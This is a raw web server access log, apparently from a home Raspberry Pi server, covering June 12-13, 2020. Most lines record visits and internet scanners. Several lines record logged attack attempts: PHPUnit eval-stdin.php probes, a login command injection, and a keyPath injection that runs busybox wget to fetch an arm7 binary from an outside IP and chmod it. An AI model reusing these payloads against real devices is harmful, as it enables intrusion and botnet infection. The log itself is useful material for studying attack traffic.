Fri Jun 12 06:25:06 MDT 2020 06:25:06 up 1 day, 21 min, 1 user, load average: 0.54, 0.30, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Thu05 25:07m 14:38 1.09s /usr/bin/lxsession -s LXDE-pi -e LXDE 195.54.160.135 - - [12/Jun/2020:12:33:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.93.4.11 - - [12/Jun/2020:12:44:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 195.54.160.135 - - [12/Jun/2020:12:49:34 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 151.66.137.138 - - [12/Jun/2020:12:58:55 +0000] "GET / HTTP/1.1" 400 0 "" "" 189.126.70.202 - - [12/Jun/2020:13:32:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 206.189.135.73 - - [12/Jun/2020:13:58:11 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 109.242.242.61 - - [12/Jun/2020:14:45:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.156.73.91 - - [12/Jun/2020:14:57:14 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 116.72.131.223 - - [12/Jun/2020:15:02:04 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:47:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:48:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:48:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:48:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:49:02 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7/documents/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Jun/2020:15:49:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:49:09 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Jun/2020:15:49:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:49:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:49:34 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:49:36 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Jun/2020:15:49:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 77.35.126.226 - - [12/Jun/2020:15:49:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [12/Jun/2020:15:50:02 +0000] "GET /ac0xl/logs/2020.06.11 HTTP/1.1" 200 13299 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Jun/2020:15:50:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:15:50:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:20:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:20:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:20:41 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:20:46 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:20:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:20:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:20:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:21:34 +0000] "GET /freedom/2020-01-08-freedom.txt HTTP/1.1" 200 2533 "http://162.250.19.7/freedom/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 122.117.177.198 - - [12/Jun/2020:16:22:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:22:14 +0000] "GET /freedom/2020-01-08-freedom.txt HTTP/1.1" 200 2533 "http://162.250.19.7/freedom/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:22:37 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "http://162.250.19.7/freedom/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:22:55 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:23:05 +0000] "GET /videos/knight-2020-05-20-underground-prisons-guillotines-comments.txt HTTP/1.1" 200 1669 "http://162.250.19.7/videos/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:23:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:23:28 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:23:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:23:40 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:23:45 +0000] "GET /documents/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:23:51 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:24:06 +0000] "GET /memes/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:77.0) Gecko/20100101 Firefox/77.0" 162.250.19.7 - - [12/Jun/2020:16:24:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:24:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Jun/2020:16:24:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.142.136 - - [12/Jun/2020:17:32:30 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 93.40.11.165 - - [12/Jun/2020:17:33:23 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 93.40.11.165 - - [12/Jun/2020:17:33:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.218.130.182 - - [12/Jun/2020:17:49:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 187.120.150.240 - - [12/Jun/2020:18:01:12 +0000] "GET / HTTP/1.1" 400 0 "" "" 195.54.161.90 - - [12/Jun/2020:18:33:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 122.116.107.185 - - [12/Jun/2020:20:08:19 +0000] "GET / HTTP/1.1" 400 0 "" "" 96.126.103.60 - - [12/Jun/2020:20:58:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 96.126.103.60 - - [12/Jun/2020:20:58:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 221.164.138.28 - - [12/Jun/2020:21:27:02 +0000] "GET / HTTP/1.1" 400 0 "" "" 138.0.136.148 - - [12/Jun/2020:22:58:46 +0000] "GET / HTTP/1.1" 400 0 "" "" 187.120.149.27 - - [12/Jun/2020:23:20:54 +0000] "GET / HTTP/1.1" 400 0 "" "" 205.185.114.231 - - [13/Jun/2020:00:25:07 +0000] "GET / HTTP/1.1" 200 25000 "http://162.250.19.7:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 41.32.184.240 - - [13/Jun/2020:01:23:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 167.249.102.140 - - [13/Jun/2020:02:05:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 114.33.148.23 - - [13/Jun/2020:03:15:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 94.65.103.164 - - [13/Jun/2020:03:23:58 +0000] "GET / HTTP/1.1" 400 0 "" "" 92.118.161.5 - - [13/Jun/2020:04:18:14 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 139.162.106.181 - - [13/Jun/2020:04:56:26 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 93.40.11.165 - - [13/Jun/2020:05:07:16 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 93.40.11.165 - - [13/Jun/2020:05:07:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 159.65.121.162 - - [13/Jun/2020:05:11:44 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 45.201.173.206 - - [13/Jun/2020:06:44:34 +0000] "GET / HTTP/1.1" 400 0 "" "" 85.105.87.39 - - [13/Jun/2020:07:04:03 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 85.105.87.39 - - [13/Jun/2020:07:04:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 83.219.136.145 - - [13/Jun/2020:08:05:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 188.11.61.14 - - [13/Jun/2020:09:09:46 +0000] "GET / HTTP/1.1" 400 0 "" "" 177.184.183.230 - - [13/Jun/2020:09:27:10 +0000] "GET / HTTP/1.1" 400 0 "" "" 92.118.161.21 - - [13/Jun/2020:10:25:57 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" Sat Jun 13 06:25:07 MDT 2020 06:25:07 up 21:03, 1 user, load average: 0.77, 0.37, 0.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Fri09 21:07m 34.72s 0.50s /usr/bin/lxsession -s LXDE-pi -e LXDE